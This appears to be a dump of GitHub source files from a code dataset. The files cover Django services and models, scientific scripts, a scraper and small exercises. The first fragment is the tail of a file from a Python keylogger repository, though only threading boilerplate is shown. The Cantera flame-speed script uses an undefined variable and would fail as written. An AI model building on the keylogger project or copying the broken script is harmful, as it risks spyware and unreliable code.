t1.start() # Start thread\r\n t2.start() # Start thread\r\n t1.join() # For concurrent execution\r\n t2.join() # For concurrent execution\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"pundaree369/Keylogger-Using-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"24354436149","text":"import json\n\nfrom rest_framework.renderers import JSONRenderer\n\nfrom api.handlers.master_location_model_handler import MasterLocationModelHandler\nfrom api.handlers.location_info_model_handler import LocationInfoModelHandler\nfrom api.handlers.user_model_handler import UserModelHandler\nfrom api.serializers.location_info_serializers import MasterLocationSerializer, LocationInfoSerializer\n\n\nclass LocationService():\n\n def __init__(self, current_user):\n self.current_user = current_user\n\n def get_location_list(self):\n queryset = MasterLocationModelHandler().find_all()\n data = MasterLocationSerializer(queryset, many=True).data\n json_data = JSONRenderer().render(data)\n return json_data\n\n def get_user_locations(self, user_id):\n try:\n for_user = UserModelHandler().find_by_id(user_id)\n if for_user:\n queryset = LocationInfoModelHandler().find_by_user(for_user)\n data = LocationInfoSerializer(queryset, many=True).data\n json_data = JSONRenderer().render(data)\n return json_data\n else:\n return json.dumps({\"Error\":\"User Not found\"})\n except Exception as ex:\n return json.dumps({\"Error\":\"Not able to fetch the locations : %s\"%(ex.message)})\n\n def add_user_location_info(self, location_json):\n try:\n location = MasterLocationModelHandler().insert(location_name=location_json[\"location\"])\n created_location_info = LocationInfoModelHandler().insert(\n user = self.current_user,\n location = location,\n when_start_date = location_json[\"when_start_date\"],\n when_end_date = location_json[\"when_end_date\"])\n\n data = LocationInfoSerializer(created_location_info).data\n json_data = JSONRenderer().render(data)\n return json_data\n except Exception as ex:\n return json.dumps({\"Error\":\"Not able to add the location : %s\"%(ex.message)})\n\n def remove_user_location_info(self, location_json):\n try:\n location_id = location_json[\"id\"]\n deleted_location = LocationInfoModelHandler().remove(location_id, self.current_user)\n return json.dumps({\"Sucess\":\"Location removed %s\"%(deleted_location.id)})\n except Exception as ex:\n return json.dumps({\"Error\":\"Not able to remove the location : %s\"%(ex.message)})\n\n def update_user_location_info(self, location_json):\n try:\n location = MasterLocationModelHandler().insert(location_name=location_json[\"location\"])\n\n updated_location_info = LocationInfoModelHandler().update(\n id = location_json[\"id\"],\n user = self.current_user,\n location = location,\n when_start_date = location_json[\"when_start_date\"],\n when_end_date = location_json[\"when_end_date\"])\n\n data = LocationInfoSerializer(updated_location_info).data\n json_data = JSONRenderer().render(data)\n return json_data\n except Exception as ex:\n return json.dumps({\"Error\":\"Not able to update the location : %s\"%(ex.message)})\n\n\n","repo_name":"vikaspandeysahaj/dostpost","sub_path":"dostpost/api/services/location_service.py","file_name":"location_service.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"4769143465","text":"from unittest_find import unittest\nimport os\nos.environ[\"PYOPENCL_CTX\"] ='0:1'\nimport chroma.api as api\napi.use_opencl()\nimport chroma.gpu.cltools as cltools\nimport chroma.gpu.clrandstate as clrand\nimport pyopencl as cl\n\nimport ROOT as rt\n\nclass TestRandomGen( unittest.TestCase ):\n def setUp(self):\n self.context = cltools.get_last_context()\n self.nthreads_per_block = 1024\n self.blocks_per_iter = 1\n self.seed = 1\n\n self.nthreads = self.nthreads_per_block*self.blocks_per_iter\n\n def testRNG(self):\n states = clrand.get_rng_states( self.context, 10000, seed=0 )\n array = cltools.fill_array( self.context, states, 10000 )\n \n out = rt.TFile(\"output_testRNG.root\",\"recreate\")\n hout = rt.TH1D(\"hrand\",\"\",1000, -2, 2 )\n for a in array:\n hout.Fill(a)\n out.Write()\n out.Close()\n\n def tearDown(self):\n pass\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"NuTufts/chroma_lartpc","sub_path":"cltest/test_randomgen.py","file_name":"test_randomgen.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"20277507253","text":"import math\nimport shutil\nimport os\nfrom typing import List\nfrom anomaly_detector.network.data_generator import DataGenerator\n\n\ndef split_test(test_path: str, n: int, **kwargs) -> None:\n all_videos = [\n video for video in next(os.walk(test_path))[1]\n if not (video.endswith('_optf') or video.startswith('Frames'))\n ]\n chunk_size = math.ceil(len(all_videos) / n)\n\n for i in range(n):\n chunk = all_videos[i * chunk_size:(i + 1) * chunk_size]\n\n for video in chunk:\n shutil.move(f'{test_path}/{video}', f'{test_path}/Test{i}/{video}')\n shutil.move(f'{test_path}/{video}_optf', f'{test_path}/Test{i}/{video}_optf')\n\n\ndef get_all_test(test_path: str, **kwargs) -> List[DataGenerator]:\n generators = []\n all_test = next(os.walk(test_path))[1]\n\n for test in all_test:\n data_generator = DataGenerator(f'{test_path}/{test}', **kwargs)\n generators.append(data_generator)\n\n return generators","repo_name":"SteveImmanuel/unet-anomaly-detection","sub_path":"anomaly_detector/utils/dataset_loader.py","file_name":"dataset_loader.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"19722199662","text":"######################################################\n# Ben Palmer University of Birmingham 2020\n# Free to use\n######################################################\n\n\nimport numpy\n\nclass colours:\n\n def lighten(colour_in, d):\n colour_in = colour_in.replace('#','')\n r = int(colour_in[0:2],16)\n g = int(colour_in[2:4],16)\n b = int(colour_in[4:6],16)\n \n r = int(min(max(0,(1 + d) * r),255))\n g = int(min(max(0,(1 + d) * g),255))\n b = int(min(max(0,(1 + d) * b),255))\n \n if(r < 16):\n r = '0' + str(colours.dentohex(r))\n else:\n r = str(colours.dentohex(r))\n \n if(g < 16):\n g = '0' + str(colours.dentohex(g))\n else:\n g = str(colours.dentohex(g))\n \n if(b < 16):\n b = '0' + str(colours.dentohex(b))\n else:\n b = str(colours.dentohex(b))\n \n colour_out = '#' + r + g + b \n \n return colour_out\n \n \n def dentohex(a):\n hexchars = \"0123456789ABCDEF\"\n output = ''\n if(a == 0):\n return '0'\n while(a > 0):\n b = a % 16\n a = int(numpy.floor(a / 16))\n output = hexchars[b] + output \n return output\n \n def hextoden(a):\n b = 0\n hexchars = \"0123456789ABCDEF\"\n for i in range(len(a)):\n k = len(a) - (i + 1)\n n = 0\n for j in range(len(hexchars)):\n if(a[k].upper() == hexchars[j]):\n n = j\n break\n b = b + n * 16**i\n return b\n \n def to_latex(colour, prefix=''):\n if(len(colour) != 7 and colour[0] != \"#\"):\n return ''\n colour_key = colours.colour_key(colour)\n r,g,b = colours.rgb(colour)\n return colour_key, r, g, b, '\\definecolor{'+colour_key+'}{RGB}{'+str(r)+','+str(g)+','+str(b)+'}'\n \n def rgb(colour):\n colour = colour.upper().strip()\n if(len(colour) != 7 and colour[0] != \"#\"):\n return 0,0,0\n return colours.hextoden(colour[1:3]),colours.hextoden(colour[3:5]), colours.hextoden(colour[5:7])\n \n def colour_key(colour):\n if(len(colour) != 7 and colour[0] != \"#\"):\n return ''\n return 'col_' + colour.replace('#','').lower()\n ","repo_name":"BenPalmer1983/tikzcrystal","sub_path":"src/colours.py","file_name":"colours.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"41125359576","text":"\"\"\"\r\nA freely-propagating, premixed flat flame with multicomponent\r\ntransport properties.\r\n\"\"\"\r\nimport cantera as ct\r\nimport numpy as np\r\nimport csv\r\nimport os\r\n\r\n#print ct.__file__\r\n\r\np = ct.one_atm\r\ntburner = 300\r\ngas = ct.Solution('gri30.cti')\r\ngas.transport_model = 'Mix'\r\nmdot = 0.6\r\n\r\ninitial_grid = np.linspace(-0.01, 0.4, 9)\r\n\r\ntol_ss = [1.0e-5, 1.0e-10] # [rtol atol] for steady-state problem \r\ntol_ts = [1.0e-5, 1.0e-10] # [rtol atol] for time stepping loglevel = 1 # amount of diagnostic output (0 to 8)\r\nrefine_grid = True # 'True' to enable refinement, 'False' to disable\r\n\r\n# Mole Fractions\r\nEQUI = 1.4\r\nEQUI_END = 2.7\r\nphi_step = 0.1\r\nphi_steps = (np.ceil((EQUI_END - EQUI)/phi_step))+1\r\nn=0\r\nphi=[0]*phi_steps\r\nfs=[0]*phi_steps\r\n\r\nio2 = gas.species_index('O2'); #Index of O2 in mix\r\nin2 = gas.species_index('N2'); #Index of N2 in mix\r\nih2 = gas.species_index('H2'); #Index of N2 in mix\r\nich4 = gas.species_index('CH4'); #Index of N2 in mix\r\niar = gas.species_index('AR'); #Index of AR in mix \r\n\r\nfor EQUI in np.arange(EQUI, EQUI_END+0.001, phi_step):\r\n    F1_Frac = 1.0;#Fraction of the first fuel in the blend\r\n    F2_Frac = 0.0;#Fraction of the second fuel in the blend\r\n    F3_Frac = 0.0;#Fraction of the third fuel in the blend\r\n    #c = 2; #Number of moles of O2 for CH4\r\n    #c= 1.25 #Number of moles for 50-50\r\n    c=0.5 #Number of moles for H2\r\n\r\n    comp = [0]*gas.n_species;\r\n    comp[ich4] = F2_Frac * EQUI\r\n    comp[ih2] = F1_Frac * EQUI\r\n    comp[io2] = c\r\n    comp[in2] = 3.76*c * 0.78/0.79 \r\n    comp[iar] = 3.76*c * 0.01/0.79 \r\n\r\n    gas.TPX = tburner, p, comp\r\n\r\n    # Flame object\r\n    f = ct.FreeFlame(gas, initial_grid)\r\n    f.flame.set_steady_tolerances(default=tol_ss)\r\n    f.flame.set_transient_tolerances(default=tol_ts)\r\n    f.set_refine_criteria(ratio=2.7, slope=0.06, curve=0.12)\r\n    f.set_grid_min(1e-9)\r\n\r\n    # Set properties of the upstream fuel-air mixture\r\n    f.inlet.T = tburner\r\n    f.inlet.X = comp\r\n    f.inlet.mdot = mdot\r\n\r\n    f.transport_model = 'Mix'\r\n    f.set_time_step(1e-5, [2, 5, 10])\r\n    f.energy_enabled = False\r\n    try:\r\n        f.solve(loglevel=loglevel, refine_grid=False)\r\n    except Exception:\r\n        print (\"failed initial solve at phi = \", EQUI)\r\n    f.energy_enabled = True\r\n\r\n    try:\r\n        f.solve(loglevel=loglevel, refine_grid=refine_grid)\r\n    except Exception:\r\n        print (\"failed mix solve at phi = \", EQUI)\r\n    print (\"\\n***************MIX ENERGY {0:7f} {1:7f}***************\".format(EQUI, f.u[0]))\r\n\r\n    f.transport_model = 'Multi'\r\n    try:\r\n        f.solve(loglevel=loglevel, refine_grid=refine_grid)\r\n    except Exception:\r\n        print (\"failed multi solve at phi = \", EQUI)\r\n    print (\"\\n***************MULTI ENERGY {0:7f} {1:7f}***************\".format(EQUI, f.u[0]))\r\n\r\n    f.soret_enabled = True\r\n    try:\r\n        f.solve(loglevel=loglevel, refine_grid=refine_grid)\r\n    except Exception:\r\n        print (\"failed soret solve at phi = \", EQUI)\r\n    f.write_csv('profile-phi{:.1f}.csv'.format(EQUI), quiet=False)\r\n    print (\"\\n***************MULTI ENERGY SORET {0:7f} {1:7f}***************\".format(EQUI, f.u[0]))\r\n\r\n    phi[n]=EQUI\r\n    fs[n] = f.u[0]\r\n    n=n+1\r\n","repo_name":"pawelsikorski7/Laminar-flame-speed-methane-hydrogen","sub_path":"laminar flame speed methane-hydrogen.py","file_name":"laminar flame speed methane-hydrogen.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"}
+{"seq_id":"74014443772","text":"\"\"\"\n    Práctica 1 - Web Scraping\n\n    Desarrollo de una herramienta para aplicar herramientas\n    de web scraping sobre un sitio web, con el fin de extraer\n    datos de interés y generar un dataset con dicha información.\n\n    ==> Autores\n    * Omar Mendo Mesa <@beejeke>\n    * Guzmán Manuel Gómez Pérez <@GGP00>\n\n    ==> Fichero\n    * src/main.py\n\n    ==> Descripción\n    Fichero principal donde se ejecuta el scraper desarrollado.\n\"\"\"\n\n\nimport click\nfrom .methods import SatelliteScraper\n\n\n@click.group()\ndef cli():\n    pass\n\n\ndef get_total_nanosats():\n    scraper_ = SatelliteScraper()\n\n    html = scraper_.get_html('https://www.nanosats.eu/database')\n    nanosats_names = scraper_.get_nanosats_names_links(html)\n    total = len(nanosats_names)\n\n    return total\n\n\n@cli.command(help='Ejecuta el scraper para obtener datos de los nanosatélites analizados.')\n@click.option('--number', '-n', 'nanosats_n', default=get_total_nanosats(), show_default=True)\n@click.option('--status', '-s', 'status', default='all', show_default=True)\ndef scrape(nanosats_n, status):\n    scraper = SatelliteScraper()\n    scraper.scraper(int(nanosats_n), status)\n    scraper.save_data_csv(nanosats_n, status)\n\n\nif __name__ == '__main__':\n    cli()\n","repo_name":"beejeke/nanosat-scraping","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"31974705882","text":"address = 'Four score and seven years ago...'\n\n# Function that finds spaces and yields the index of each word start\n\n\ndef index_words_iter(text):\n    if text:\n        yield 0\n    for idx, letter in enumerate(text):\n        if letter == ' ':\n            yield idx + 1\n\n\nit = index_words_iter(address)\nprint(next(it))\nprint(next(it))\nprint(list(it))  # Careful: the iterator holds state!
재사용 불가.\n\n\n# 리스트로 쉽게 변환 가능\nresult_list = list(index_words_iter(address))\nprint(result_list)\n","repo_name":"jongkyuu/Effective_Python","sub_path":"ch4_컴프리핸션과_제너레이터/bw30.py","file_name":"bw30.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74324303611","text":"from taskSwitching.component_rest import *\n\n\nclass ComponentStart(ComponentRest):\n \"\"\"\n Shows the next task type information.\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n for k in kwargs.keys():\n self.__setattr__(k, kwargs[k])\n\n def main(self):\n # Will show the start card and wait for a keypress\n self.countdown.text = \"Press 1, 2, or 3 to begin\" \n self.draw()\n self.experiment.window.flip()\n \n self.experiment.synch.wait_for_button()\n","repo_name":"daniellekurtin/task_switching_paradigm","sub_path":"taskSwitching/component_start.py","file_name":"component_start.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"37961093749","text":"import os\n\n# Already downloaded in Dockerfile\nSCALA_VERSION = \"2.12\"\nSPARK_VERSION = \"3.1.2\"\nos.environ['PYSPARK_SUBMIT_ARGS'] = f\"--packages \" \\\n f\"org.apache.spark:spark-avro_{SCALA_VERSION}:{SPARK_VERSION},\" \\\n f\"org.apache.spark:spark-sql-kafka-0-10_{SCALA_VERSION}:{SPARK_VERSION},\" \\\n f\"mysql:mysql-connector-java:8.0.29 \" \\\n f\"pyspark-shell\"\n\n# Debezium Connector Settings\nDEBEZIUM_CONNECTOR_HOST = str(os.environ.get('DEBEZIUM_CONNECTOR_HOST'))\nDEBEZIUM_CONNECTOR_PORT = str(os.environ.get('DEBEZIUM_CONNECTOR_PORT'))\nKAFKA_BOOSTRAP_SERVERS = str(os.environ.get('BOOTSTRAP_SERVERS'))\n\n# Do not change the value of this property.\n# https://debezium.io/documentation/reference/stable/connectors/mysql.html#mysql-property-database-server-name\nCONNECTOR_NAMESPACE = \"dbserver1\"\nINCLUDED_DATABASE = \"inventory\"\nMYSQL_CONNECTOR_CONF = {\n \"name\": \"inventory-connector\",\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\",\n \"tasks.max\": \"1\",\n \"database.hostname\": str(os.environ.get('MYSQL_HOST')),\n \"database.port\": str(os.environ.get('MYSQL_PORT')),\n \"database.user\": str(os.environ.get('MYSQL_ROOT_USER')),\n \"database.password\": str(os.environ.get('MYSQL_ROOT_PASSWORD')),\n \"database.server.id\": \"184054\",\n \"database.server.name\": CONNECTOR_NAMESPACE,\n \"database.include.list\": INCLUDED_DATABASE,\n \"database.history.kafka.bootstrap.servers\": KAFKA_BOOSTRAP_SERVERS,\n \"database.history.kafka.topic\": \"dbhistory.inventory\",\n }\n}\n\n# JDBC settings for data stream writer\nJDBC_CONFIG = {\n \"driver\": \"com.mysql.jdbc.Driver\",\n \"url\": \"jdbc:mysql://mysql:3306/inventory?rewriteBatchedStatements=true\"\n}\n\nDB_CONFIG = {\n \"name\": \"mysql\",\n \"host\": os.environ.get('MYSQL_HOST'),\n \"port\": os.environ.get('MYSQL_PORT'),\n \"user\": os.environ.get('MYSQL_USER'),\n \"password\": os.environ.get('MYSQL_PASSWORD'),\n}\n","repo_name":"ntnhaatj/cdc-ingestion-debezium","sub_path":"svc/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"31194686509","text":"import numpy as np\nimport string\n\nclass Root:\n\tdef __init__(self):\n\t\tself.R=None\n\t\tself.L=None\n\nclass Column:\n\tdef 
__init__(self):\n\t\tself.R=None\n\t\tself.L=None\n\t\tself.U=None\n\t\tself.D=None\n\t\tself.S=0\n\t\tself.N=\"\"\n \nclass Node:\n\tdef __init__(self):\n\t\tself.R=None\n\t\tself.L=None\n\t\tself.U=None\n\t\tself.D=None\n\t\tself.C=None\n\ndef mat2linklist(A, column_names=None):\n\t\"\"\"\n\tA: 0-1 array\n\t\"\"\"\n\troot = Root()\n\ttmp1 = root\n\tr_n,c_n = A.shape \n\tnodes = [None] * c_n\n\tfor j in range(c_n):\n\t\tcolumn_header = Column()\n\t\tif column_names:\n\t\t\tcolumn_header.N = column_names[j]\n\t\telse:\n\t\t\tcolumn_header.N = j\n\t\ttmp2 = column_header\n\t\ttmp1.R = column_header\n\t\tcolumn_header.L = tmp1\n\t\ttmp1 = column_header\n\t\tcolumn = [None] * r_n\n\t\tfor i in range(r_n):\n\t\t\tif A[i,j] == 1:\n\t\t\t\tcolumn_header.S += 1\n\t\t\t\tnode = Node()\n\t\t\t\tcolumn[i] = node\n\t\t\t\tnode.C = column_header\n\t\t\t\ttmp2.D = node\n\t\t\t\tnode.U = tmp2\n\t\t\t\ttmp2 = node\n\t\tnodes[j] = column \n\t\ttmp2.D = column_header\n\t\tcolumn_header.U = tmp2\n\n\ttmp1.R=root\n\troot.L=tmp1\n \n\tfor i in range(r_n):\n\t\tfor j in range(c_n):\n\t\t\tif A[i,j] == 1:\n\t\t\t\ttmp = nodes[j][i]\n\t\t\t\t# keeps searching the next 1 on the right\n\t\t\t\tfor k in range(1, c_n+1):\n\t\t\t\t\tif A[i, np.mod(j+k, c_n)]==1:\n\t\t\t\t\t\tnode_r = nodes[np.mod(j+k,c_n)][i]\n\t\t\t\t\t\ttmp.R = node_r\n\t\t\t\t\t\tnode_r.L = tmp\n\t\t\t\t\t\ttmp = node_r\n\t\t\t\tbreak\n\treturn root\n\n","repo_name":"Varato/DancingLinks","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22203218945","text":"from django.db import models\nimport uuid\nimport cstruct\nimport base64\nimport datetime\n\nclass RawRequestLog(models.Model):\n\trequest_uuid = models.UUIDField(primary_key=True)\n\trequest_timestamp_utc = models.DateTimeField()\n\trequest_helium_integration_details = models.CharField(max_length=255, null=True)\n\trequest_text = models.CharField(max_length=8000)\n\n\tclass Meta:\n\t\tdb_table = 'supernova_raw_request_log'\n\nclass PacketEvent(models.Model):\n\trequest_uuid = models.OneToOneField(RawRequestLog, primary_key=True, on_delete=models.CASCADE, db_column='request_uuid')\n\trequest_timestamp_utc = models.DateTimeField()\n\trequest_helium_integration_details = models.CharField(max_length=255, null=True)\n\n\tapp_eui = models.CharField(max_length=16)\n\tdc_balance = models.IntegerField()\n\tdc_nonce = models.IntegerField()\n\tdev_eui = models.CharField(max_length=16)\n\tdevaddr = models.CharField(max_length=8)\n\tdownlink_url = models.URLField()\n\tfcnt = models.IntegerField()\n\tid = models.UUIDField()\n\thotspot_count = models.IntegerField()\n\tmetadata_adr_allowed = models.BooleanField()\n\tmetadata_cf_list_enabled = models.BooleanField()\n\tmetadata_multi_buy = models.IntegerField()\n\tmetadata_organization_id = models.CharField(max_length=36)\n\tmetadata_preferred_hotspots = models.JSONField()\n\tmetadata_rx_delay = models.IntegerField()\n\tmetadata_rx_delay_actual = models.IntegerField()\n\tmetadata_rx_delay_state = models.CharField(max_length=255)\n\tname = models.CharField(max_length=255)\n\tpayload = models.CharField(max_length=255)\n\tpayload_size = models.IntegerField()\n\tport = models.IntegerField()\n\traw_packet = models.CharField(max_length=255)\n\treplay = models.BooleanField()\n\treported_at = models.BigIntegerField()\n\ttype = models.CharField(max_length=255)\n\tuuid = models.UUIDField()\n\n\tclass Meta:\n\t\tdb_table = 
'supernova_packet_event'\n\t\nclass PacketEventHotspot(models.Model):\n\tid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n\n\t# one-to-many relationship with PacketEvent (one packet can have many hotspots)\n\trequest_uuid = models.ForeignKey(PacketEvent, on_delete=models.CASCADE, db_column='request_uuid')\n\t\n\thotspot_num_within_packet = models.IntegerField(null=False) # starts at 0\n\n\tchannel = models.IntegerField()\n\tfrequency = models.FloatField()\n\thold_time = models.IntegerField()\n\thotspot_id = models.CharField(max_length=255) # renamed from 'id'\n\tlat = models.FloatField()\n\tlong = models.FloatField()\n\tname = models.CharField(max_length=255)\n\treported_at = models.BigIntegerField()\n\trssi = models.FloatField()\n\tsnr = models.FloatField()\n\tspreading = models.CharField(max_length=255)\n\tstatus = models.CharField(max_length=255)\n\n\tclass Meta:\n\t\tdb_table = 'supernova_packet_event_hotspot'\n\n\t\t# set a unique key\n\t\tunique_together = (('request_uuid', 'hotspot_num_within_packet'),)\n\n\t\t# TODO add a constrant to ensure hotspot_num_within_packet < PacketEvent.hotspot_count\n\nclass PacketType1(models.Model):\n\trequest_uuid = models.OneToOneField(PacketEvent, primary_key=True, on_delete=models.CASCADE, db_column='request_uuid', related_name='packet_type_1')\n\trequest_timestamp_utc = models.DateTimeField()\n\trequest_helium_integration_details = models.CharField(max_length=255, null=True)\n\n\tpacket_type = models.PositiveIntegerField()\n\tmillis_since_boot = models.PositiveIntegerField()\n\tpacket_seq_num = models.PositiveIntegerField()\n\tlora_dr_value = models.PositiveIntegerField()\n\n\tthemistor_1_temperature_c = models.SmallIntegerField()\n\tthemistor_2_temperature_c = models.SmallIntegerField()\n\tdht_temperature_c = models.SmallIntegerField()\n\tdht_humidity_pct = models.SmallIntegerField()\n\tbmp_pressure_pa = models.FloatField()\n\tbmp_temperature_c = models.FloatField()\n\tbattery_voltage_mv = models.PositiveIntegerField()\n\tmcu_internal_temperature_c = models.SmallIntegerField()\n\tis_switch_rtf = models.BooleanField()\n\n\tgps_latitude_degrees = models.FloatField()\n\tgps_longitude_degrees = models.FloatField()\n\tgps_altitude_m = models.FloatField()\n\tgps_speed_m_per_s = models.FloatField()\n\tgps_course_degrees = models.FloatField()\n\n\tgps_satellite_count = models.PositiveIntegerField()\n\tgps_hdop_m = models.FloatField()\n\n\tgps_fix_date_epoch_time_sec = models.PositiveIntegerField()\n\tgps_fix_date_age_ms = models.PositiveIntegerField()\n\n\tclass Meta:\n\t\tdb_table = 'supernova_packet_type_1'\n\n\t@classmethod\n\tdef construct_from_base64(cls, base64_str: str, request_uuid: PacketEvent, request_timestamp_utc: datetime.datetime, request_helium_integration_details: str):\n\t\t\"\"\"\n\t\tConstructs a PacketType1 object from a hex string.\n\t\t\"\"\"\n\n\t\tclass DataPacket1CStruct(cstruct.MemCStruct):\n\t\t\t__def__ = \"\"\"\n\t\t\t\n\t\t\tstruct {\n\t\t\t\tuint8_t packet_type; // always 1 for this struct\n\t\t\t\tuint32_t millis_since_boot;\n\t\t\t\tuint16_t packet_seq_num;\n\t\t\t\tuint8_t lora_dr_value;\n\n\t\t\t\tint8_t themistor_1_temperature_c;\n\t\t\t\tint8_t themistor_2_temperature_c;\n\t\t\t\tint8_t dht_temperature_c;\n\t\t\t\tint8_t dht_humidity_pct;\n\t\t\t\tfloat bmp_pressure_pa;\n\t\t\t\tfloat bmp_temperature_c;\n\t\t\t\tuint16_t battery_voltage_mv;\n\t\t\t\tint8_t mcu_internal_temperature_c;\n\t\t\t\tuint8_t is_switch_rtf;\n\n\t\t\t\t// HERE is a good split if we ever wanted 2 different types of 
packets\n\t\t\t\tint32_t gps_latitude_degrees_x1e6;\n\t\t\t\tint32_t gps_longitude_degrees_x1e6;\n\t\t\t\tint32_t gps_altitude_cm;\n\t\t\t\tint32_t gps_speed_100ths_of_knot;\n\t\t\t\tint32_t gps_course_100ths_of_degree;\n\t\t\t\tuint16_t gps_satellite_count;\n\t\t\t\tint32_t gps_hdop_cm;\n\t\t\t\tuint32_t gps_fix_date_epoch_time_sec;\n\t\t\t\tuint32_t gps_fix_date_age_ms;\n\t\t\t};\n\t\t\t\"\"\"\n\n\t\tdata = base64.b64decode(base64_str)\n\t\tpacket = DataPacket1CStruct()\n\t\tpacket.unpack(data)\n\n\t\treturn cls(\n\t\t\trequest_uuid=request_uuid,\n\t\t\trequest_timestamp_utc=request_timestamp_utc,\n\t\t\trequest_helium_integration_details=request_helium_integration_details,\n\t\t\tpacket_type=packet.packet_type,\n\t\t\tmillis_since_boot=packet.millis_since_boot,\n\t\t\tpacket_seq_num=packet.packet_seq_num,\n\t\t\tlora_dr_value=packet.lora_dr_value,\n\t\t\tthemistor_1_temperature_c=packet.themistor_1_temperature_c,\n\t\t\tthemistor_2_temperature_c=packet.themistor_2_temperature_c,\n\t\t\tdht_temperature_c=packet.dht_temperature_c,\n\t\t\tdht_humidity_pct=packet.dht_humidity_pct,\n\t\t\tbmp_pressure_pa=packet.bmp_pressure_pa,\n\t\t\tbmp_temperature_c=packet.bmp_temperature_c,\n\t\t\tbattery_voltage_mv=packet.battery_voltage_mv,\n\t\t\tmcu_internal_temperature_c=packet.mcu_internal_temperature_c,\n\t\t\tis_switch_rtf=packet.is_switch_rtf,\n\t\t\tgps_latitude_degrees=packet.gps_latitude_degrees_x1e6 / 1e6,\n\t\t\tgps_longitude_degrees=packet.gps_longitude_degrees_x1e6 / 1e6,\n\t\t\tgps_altitude_m=packet.gps_altitude_cm / 100,\n\t\t\tgps_speed_m_per_s=packet.gps_speed_100ths_of_knot / 100 * 0.514444444, # knots to m/s\n\t\t\tgps_course_degrees=packet.gps_course_100ths_of_degree / 100,\n\t\t\tgps_satellite_count=packet.gps_satellite_count,\n\t\t\tgps_hdop_m=packet.gps_hdop_cm / 100,\n\t\t\tgps_fix_date_epoch_time_sec=packet.gps_fix_date_epoch_time_sec,\n\t\t\tgps_fix_date_age_ms=packet.gps_fix_date_age_ms,\n\t\t)\n\t","repo_name":"DeflateAwning/project-supernova-balloon-server","sub_path":"supernova/supernova_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72022218811","text":"def drive(cars_dict, car_name, drive_distance, needed_fuel):\n current_fuel = cars_dict[car_name]['fuel']\n if current_fuel < needed_fuel:\n print(\"Not enough fuel to make that ride\")\n else:\n cars_dict[car_name]['mileage'] += drive_distance\n cars_dict[car_name]['fuel'] -= needed_fuel\n print(f\"{car_name} driven for {drive_distance} kilometers. 
{needed_fuel} liters of fuel consumed.\")\n if cars_dict[car_name]['mileage'] >= 100000:\n del cars_dict[car_name]\n print(f\"Time to sell the {car_name}!\")\n return cars_dict\n\n\ndef refuel(cars_dict, car_name, refill_fuel):\n current_fuel = cars_dict[car_name]['fuel']\n if current_fuel + refill_fuel > 75:\n cars_dict[car_name]['fuel'] = 75\n print(f\"{car_name} refueled with {75 - current_fuel} liters\")\n else:\n cars_dict[car_name]['fuel'] += refill_fuel\n print(f\"{car_name} refueled with {refill_fuel} liters\")\n return cars_dict\n\n\ndef revert(cars_dict, car_name, given_kilometers):\n if cars_dict[car_name]['mileage'] - given_kilometers < 10000:\n cars_dict[car_name]['mileage'] = 10000\n else:\n cars_dict[car_name]['mileage'] -= given_kilometers\n print(f\"{car_name} mileage decreased by {given_kilometers} kilometers\")\n return cars_dict\n\n\nn = int(input())\ncars = {}\n\nfor _ in range(n):\n car_inf = input().split('|')\n cars[car_inf[0]] = {'mileage': int(car_inf[1]), 'fuel': int(car_inf[2])}\n\n\ndata = input()\n\nwhile not data == \"Stop\":\n splitted_data = data.split(\" : \")\n command = splitted_data[0]\n\n if command == \"Drive\":\n car = splitted_data[1]\n distance = int(splitted_data[2])\n fuel_need = int(splitted_data[3])\n cars = drive(cars, car, distance, fuel_need)\n elif command == \"Refuel\":\n car = splitted_data[1]\n fuel_refill = int(splitted_data[2])\n cars = refuel(cars, car, fuel_refill)\n elif command == \"Revert\":\n car = splitted_data[1]\n kilometers = int(splitted_data[2])\n cars = revert(cars, car, kilometers)\n\n data = input()\n\nsorted_cars = sorted(cars.items(), key=lambda x: (- x[1]['mileage'], x[0]))\n\nfor car, value in sorted_cars:\n print(f\"{car} -> Mileage: {value['mileage']} kms, Fuel in the tank: {value['fuel']} lt.\")\n\n\n\n\n","repo_name":"zhyordanova/Python-Fundamentals","sub_path":"Exam-Preparation/Final-Exam/need_for_speed.py","file_name":"need_for_speed.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71111228733","text":"from dlw.views import *\nimport dlw.views.globals as g\n@login_required\n@role_required(urlpass='/partqry/')\ndef 